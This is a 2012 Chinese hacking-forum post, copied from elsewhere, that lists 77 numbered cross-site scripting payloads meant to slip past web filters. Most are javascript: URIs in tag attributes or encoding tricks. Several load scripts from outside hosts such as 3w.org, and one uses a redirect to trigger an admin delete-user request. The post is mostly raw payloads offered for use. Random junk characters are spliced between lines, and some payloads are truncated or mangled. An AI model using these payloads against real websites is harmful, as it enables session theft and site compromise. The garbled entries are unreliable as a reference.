找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3574|回复: 0
打印 上一主题 下一主题

xss跨站脚本攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:56:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
. S& g; G2 n/ m+ \- B6 I7 U8 J  K* J: Q
(1)普通的XSS JavaScript注入& W7 J/ |3 o! j, a$ T
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>1 O7 ?9 `9 n! }+ }% K! x: N

+ U2 O5 c: ?6 k4 g: { (2)IMG标签XSS使用JavaScript命令
7 @+ r* ]# ^  H( P1 S% } <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 @( t8 ~- o* ^# q8 r/ U5 r3 }! T1 E
(3)IMG标签无分号无引号8 N6 t$ m' P* s' A, W3 v
<IMG SRC=javascript:alert(‘XSS’)>
2 D% F3 d! j4 `5 ^$ F  m& H' V
3 F* ^2 ~0 ~/ W% X( u9 a (4)IMG标签大小写不敏感1 q; e! q9 p3 e' K5 A
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
: X+ D$ v$ x' L1 n/ a) x7 p
; D, v# U5 B7 \% M2 w9 Y# V (5)HTML编码(必须有分号)
/ ~. X& X3 E) f5 J; f <IMG SRC=javascript:alert(“XSS”)>
* a# o: z# C* F2 M4 v3 U7 {" C: W- m. n+ L6 i( F2 U1 t( q1 u
(6)修正缺陷IMG标签1 U1 {5 d! W. h/ n
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>* t+ M/ l- X* C6 x- w
3 \/ o' w7 J* w3 w0 ^" g/ y# ?7 [
(7)formCharCode标签(计算器). ^/ h; b: k; {1 m$ B* `% R$ [9 m
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>/ N; h- k8 T2 Y' X& r
3 a3 j7 g+ ?" N, z! D& V
(8)UTF-8的Unicode编码(计算器)& Q$ D0 F- B. `, t
<IMG SRC=jav..省略..S')>
2 a" k' Y7 G7 r  o7 e) x0 Q" J3 x- p+ c  g, e/ [
(9)7位的UTF-8的Unicode编码是没有分号的(计算器); A5 ]+ i( O5 A. D6 l8 d
<IMG SRC=jav..省略..S')>( }+ U" W1 C! ^) J. S) q
/ s, Z( i8 N* W$ Z
(10)十六进制编码也是没有分号(计算器)
- R! L/ s" S9 d" B* _# W <IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>5 A8 W  D* T, G0 ~
. x. K- k# Y, {5 V+ h
(11)嵌入式标签,将Javascript分开. H; o# d4 M; N3 I: b' E0 W5 i
<IMG SRC=”jav ascript:alert(‘XSS’);”>  O1 x) h" b& `5 _' X

' ^9 R1 a6 j+ L% q9 ^% E0 t* s (12)嵌入式编码标签,将Javascript分开6 f. T+ T  b5 o( @& @) V8 Y$ R: ~
<IMG SRC=”jav ascript:alert(‘XSS’);”>5 b4 b2 Y! ^9 G4 o
+ s% b2 N, S; w) x
(13)嵌入式换行符
1 r( k1 j# F9 g, G7 r <IMG SRC=”jav ascript:alert(‘XSS’);”>
7 h/ D/ s1 ^/ T8 |" j; x% P2 A* o. m: A
(14)嵌入式回车+ ^! T) k9 \# o- u5 d
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 e3 T  \* l0 n2 J
# \6 o9 h0 G5 @; f. v$ c( p (15)嵌入式多行注入JavaScript,这是XSS极端的例子7 l9 |$ F7 C' \- ~" |9 E# D
<IMG SRC=”javascript:alert(‘XSS‘)”>
5 m/ D6 H, _) h8 i' u" X
; x% s1 j% w" z2 } (16)解决限制字符(要求同页面)
6 s$ L; Z. O8 {+ f5 g! v <script>z=’document.’</script>
7 s- d/ [( h# w% ~5 | <script>z=z+’write(“‘</script>1 l  Q$ w9 W( M
<script>z=z+’<script’</script>6 Z2 B2 W8 O; r9 ^2 ^
<script>z=z+’ src=ht’</script>
/ U% N* W) C1 G <script>z=z+’tp://ww’</script>( {  \2 u( g5 l% P! y
<script>z=z+’w.shell’</script>
1 U. p6 T; f, W& D <script>z=z+’.net/1.’</script>4 s. y& J; l, o# r) U* ~
<script>z=z+’js></sc’</script>+ d! S7 |5 [( g9 o+ M% \
<script>z=z+’ript>”)’</script>+ U; A$ e# `- l
<script>eval_r(z)</script>9 ~7 m. u; H) H! N7 i
2 O& l$ x6 `5 K1 ?5 f
(17)空字符7 {( f+ I. g% ?/ f0 v: ?
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
; O9 r8 h0 |% _/ |. E  T1 x% ~5 j  q! D, @
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用4 A1 E& b" M; i. k" j$ P
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out+ I* u) L; k4 ]& i1 _

: F7 z6 N2 Q% g (19)Spaces和meta前的IMG标签% A: H! |1 X; B" H5 p1 E
<IMG SRC=”   javascript:alert(‘XSS’);”>; r' b4 E# w2 B6 Q# K
. n( A9 b5 o  c2 G- a8 L
(20)Non-alpha-non-digit XSS0 k5 s9 N9 |" J% d. i6 N# G
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>% B: t* x, I# z5 p

1 K: W- b# [: a5 C (21)Non-alpha-non-digit XSS to 20 E# X9 g1 N8 _# x9 S4 m
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
. g# X( \" H) J/ Y. j* V
* N  @- Z% H9 {# O (22)Non-alpha-non-digit XSS to 3
0 c' L5 a- Y/ C <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
; u5 M- Z! H5 m. N
5 ~" }2 F1 o; ^( Q" D (23)双开括号- c( U2 v) \) V, D2 |, p' r" T& i. T
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
3 U. g+ i( H& k7 w  C" r
1 z8 e) T5 y$ o" [ (24)无结束脚本标记(仅火狐等浏览器)5 z7 O7 Q+ b4 a+ ?4 M) D
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
/ M, s$ j. l9 [6 m% H3 I- |3 T# o( ]
(25)无结束脚本标记20 ]9 b! }# A3 E- [& x
<SCRIPT SRC=//3w.org/XSS/xss.js>9 S8 Z7 S* X  g
9 Q8 M! ^, j% o  y. |0 O
(26)半开的HTML/JavaScript XSS
4 v+ c! b0 ?' x <IMG SRC=”javascript:alert(‘XSS’)”
6 v! W, ^+ T: v4 f
/ K3 [% ]: T$ w4 i. b (27)双开角括号
4 E" E! }3 M  { <iframe src=http://3w.org/XSS.html <
+ l5 ~* m  m& N2 X1 x
& z# ?- p/ ~: w) I: Y (28)无单引号 双引号 分号
  r, `) p1 b8 E <SCRIPT>a=/XSS/
# U, v9 z5 V# U0 q) R; Z alert(a.source)</SCRIPT>% V( }6 e. o( C* Q

! g, s2 x% K: ?% ] (29)换码过滤的JavaScript! W! s- |. B2 H. ~/ @& S: w
\”;alert(‘XSS’);//
& f/ L! p9 A! R) m. ], g
9 Z3 P3 i  g( ?* v+ h (30)结束Title标签% X/ k8 W6 u2 J1 ^& i+ Y
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>% P& _  |# I$ R) Z, n
4 j: S" T/ ?6 {7 C6 `* v: `% W
(31)Input Image% X3 \0 K1 D5 G% |; u
<INPUT SRC=”javascript:alert(‘XSS’);”>
, S( I7 ~/ ~* F' o
/ F. U2 C1 h# I9 k (32)BODY Image
) n  f  r4 |' s$ Q. z4 x6 a <BODY BACKGROUND=”javascript:alert(‘XSS’)”>8 H/ l* t" d# u5 K$ ?* _
6 o; Q* t& w2 `$ ^' ?% j
(33)BODY标签
6 P4 U4 ^) A1 i3 O( P7 w <BODY(‘XSS’)>' i  b' r. g+ [3 L  x  o
) S, X4 q' \+ e! [4 b
(34)IMG Dynsrc- h) A* [  \( h) d
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
& i$ I& s, L8 u; g! w5 s; }! z: N) K& H
(35)IMG Lowsrc+ L( C7 |* u) j% N2 ?; X
<IMG LOWSRC=”javascript:alert(‘XSS’)”>4 X! @) r# ]" T1 B3 f' G' m$ x
- P* d1 {4 {( W8 [7 n; @
(36)BGSOUND
" D; J4 \( v# {( A0 |! U( s <BGSOUND SRC=”javascript:alert(‘XSS’);”>
6 P9 t' g6 ]* f, ]1 {- Y$ C0 A6 f4 d9 ?) y! ~9 O" `
(37)STYLE sheet  |/ r; e4 W. s- `6 |9 W  L
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
' P7 f; W) P% h% F9 D6 `, U8 n, {2 E" p% a" d% D6 F0 v' z* G- O
(38)远程样式表
+ B7 a* w8 M' E! f3 { <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
6 O2 K4 k9 t6 g
, O3 \4 s2 Q4 [  Q" N4 u$ K  k (39)List-style-image(列表式)# D7 W( T) `" y. U
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS& X' b. b! t2 w2 B. W/ R

6 y( a% j& p! d( Q# Q7 z (40)IMG VBscript+ ^( T2 E+ G4 W8 V3 t3 H* x9 f
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS; `! R; {! ^+ e

4 D0 C( e8 T9 G) L! |/ ] (41)META链接url* ]2 e6 e- g" e. V( R& m2 q
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
8 U  T( ?) d9 x: n: S1 s( O9 c: B$ I5 U
(42)Iframe
# x2 z8 y- M7 k7 m7 J+ M( g <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>4 }5 b" k" {& c1 J! C% n

6 _) f; Q% ]7 o1 ]4 G: N9 M5 G- c (43)Frame" f! |5 V. O6 D. K
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
2 Q! ?4 h0 O' y& K) \8 l
1 P2 J- N* y" V  M (44)Table4 a! Q: N% ]* g8 b# t
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>! X, f. N3 [9 f5 ]) n) ?; c

+ ~% d1 r2 F  N9 K (45)TD
& k& r- O; l' q& \6 M0 f <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>* @5 Q7 h1 C0 q2 Q3 j

5 P& W; P+ Z* `; e (46)DIV background-image
3 Y4 K% L0 v  k6 ^  ~5 b7 N <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ d# s: W) W# B% _6 k

( t* {" S5 K$ h% | (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
; k- m8 W# _( n' q <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>  D, a+ s( ~6 ^  p

$ a0 |6 f( w$ y; B* @2 L (48)DIV expression
3 V0 P" u. W0 [# N; Y <DIV STYLE=”width: expression_r(alert(‘XSS’));”>& T0 i& z+ _5 m3 C3 @# s

% H) D0 ^5 ]# T3 w# l+ E- \ (49)STYLE属性分拆表达
, Z9 n' x- _( E/ k- E& c% b! _ <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
: d% h  ?4 C/ Y5 z8 H! H2 {
: V- q9 o' K+ H* d( s+ m  N (50)匿名STYLE(组成:开角号和一个字母开头)9 |( v, z$ ?4 x4 ]5 }2 K. i, j
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>/ k7 M3 \$ n5 W3 m% m( X( f
2 I: j0 Q$ d+ i- P" h4 Z
(51)STYLE background-image! y/ V+ f" r: q: [# `* M
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>& u' u( H$ {" s% F9 W* ~4 m
5 X$ Q/ w  P' o5 f: J; a% W
(52)IMG STYLE方式
8 x; I5 Q- L; B6 a" B# R+ ^ exppression(alert(“XSS”))’>7 Y2 W4 M1 r& r/ W
; V  n/ Y! A8 _- N
(53)STYLE background
3 m1 k( R, P4 u5 h9 D: L8 ^! R <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>9 X, ?7 b8 K- f0 C" s6 l3 T! A

- m2 _4 j0 A0 d! q8 f6 q8 I9 \& j (54)BASE
( R+ j* }# ]3 |9 U& S  w <BASE HREF=”javascript:alert(‘XSS’);//”>
) R1 `; p6 _2 Z/ }
; d/ w) |  ^5 h: i2 ^, y( z% n (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
0 j* S) z' p% h6 } <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>6 }- Q; k2 C4 y; h( P

, R' \: Z+ ~" j& i1 r' A (56)在flash中使用ActionScrpt可以混进你XSS的代码7 s! ~8 X8 I1 i' U( I' [. J5 V5 L
a=”get”;" s. u" M; Y* _1 m" t* ?
b=”URL(\”";, c3 ^3 {/ H6 O& ?
c=”javascript:”;
& Z$ _3 }$ i. f5 X; r: A( s' C% K' A% C d=”alert(‘XSS’);\”)”;2 v$ G+ y+ a% A$ ]3 I, }3 s
eval_r(a+b+c+d);0 q& q' p6 x1 ~- @& p* b
  O. P) ~$ i2 L& w
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上' Q8 H  Y8 _5 x9 l! M
<HTML xmlns:xss>
( T2 e  y6 Z2 u: o' {) U. [ <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>. X' @) _8 k! f3 C3 m
<xss:xss>XSS</xss:xss>
7 o2 ~" K% v7 f3 q9 F9 p$ |* K </HTML>
6 ^2 n/ g5 [9 `8 p) f' v6 \  R
, ^5 j* g' e( T5 ?8 R (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
  I0 g4 D8 E" Z# O <SCRIPT SRC=””></SCRIPT>/ T" O8 K/ @! z
$ e: y0 Y& d7 P
(59)IMG嵌入式命令,可执行任意命令& }# B  N3 t& y
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
2 T6 i" p1 k8 @. m
! ?, o. G% N7 ]# Y (60)IMG嵌入式命令(a.jpg在同服务器)
! j. h" u' H) q' X6 { Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
: L, m7 I) y$ K5 p
0 X9 ]0 I7 a2 c3 s& u (61)绕符号过滤3 h" l0 o* S; Y+ p% i( w
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
' D5 N, c" l0 o4 g3 r7 j$ `* G4 e
(62)3 ^) l0 a: {: H0 ?/ f$ X# A8 {5 G
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
: C& `* E2 A# D, o. d/ b# ?' |& X/ G$ c  u+ A  w6 P6 n
(63)7 ~4 M& Y7 c3 _0 w/ J$ u
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
+ }9 b* v  e/ {( \0 V" c
' I/ ?7 i' L+ {/ O  _1 O (64)2 ~+ x  r# p0 |; K0 I9 N  v
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>" n. s2 F, O' B$ q

, i6 [1 n( w. O$ T4 n (65)# ^2 a+ i: X, s; y0 u2 c& t0 h
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>$ B% q; Z7 c3 F/ G1 S
- M6 p' |; Y$ }: F2 T+ p0 a
(66)
: y+ P: [8 b$ Y7 k0 e <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
' N& M; |5 e4 U+ d
& t1 @8 \$ N/ `! k4 A' G (67)
- M0 E$ \6 {0 C <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>4 L! O% o. p5 f. h( ~1 V5 a3 [

' g  }$ U+ w: Z# R) U (68)URL绕行  W9 w( |- e+ q- R4 z
<A HREF=”http://127.0.0.1/”>XSS</A>
  J1 i, @; i& B
9 M2 t* ^' x0 e# I& q' T, w. G (69)URL编码
9 W/ X$ L) A/ u) p$ ] <A HREF=”http://3w.org”>XSS</A>, H( e. ?; F- \" {

) J4 i# t$ O# T8 i* {( h (70)IP十进制( ]9 c; E8 s" _* G: I
<A HREF=”http://3232235521″>XSS</A>
9 y9 Q, Z5 d& Z
6 R, V- Q$ x+ M: g2 a (71)IP十六进制
% _0 A+ t4 p8 W' w5 v  S# x, F <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
4 R, S0 E" L# A- C$ A( Z- R) u
' a' {1 y2 e8 \, t( k (72)IP八进制6 c+ b2 c" i& ]5 h. e$ @; n
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
" N9 e* j; f) T! R, B" `
: H* _% P& R& B5 w (73)混合编码1 U! k; |" F9 t& c# g
<A HREF=”h, ^8 y, J' Y4 ]$ B0 x" a4 t
tt p://6 6.000146.0×7.147/”">XSS</A>& O/ |* |) [1 w  [& H- w# h
$ v5 j( U/ _. }& y; z
(74)节省[http:]. o! s" w3 z" p* f& ~" Q
<A HREF=”//www.google.com/”>XSS</A>) F9 h  R- ^* X7 Z

; i5 c& j8 a# q (75)节省[www]
" }5 V9 _$ c# @4 I0 v <A HREF=”http://google.com/”>XSS</A>3 [% |1 `/ h; `1 @6 E- y# I  L9 \
$ {- L6 {, x- W6 F0 M
(76)绝对点绝对DNS
6 j1 b. ?( p2 j0 C <A HREF=”http://www.google.com./”>XSS</A>
5 ?: [/ `3 [, I) Y3 j% Y" k- C5 }% r, ~4 ^, l/ |, c
(77)javascript链接; p- p% ^' T) O; G" s" U) N8 g
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表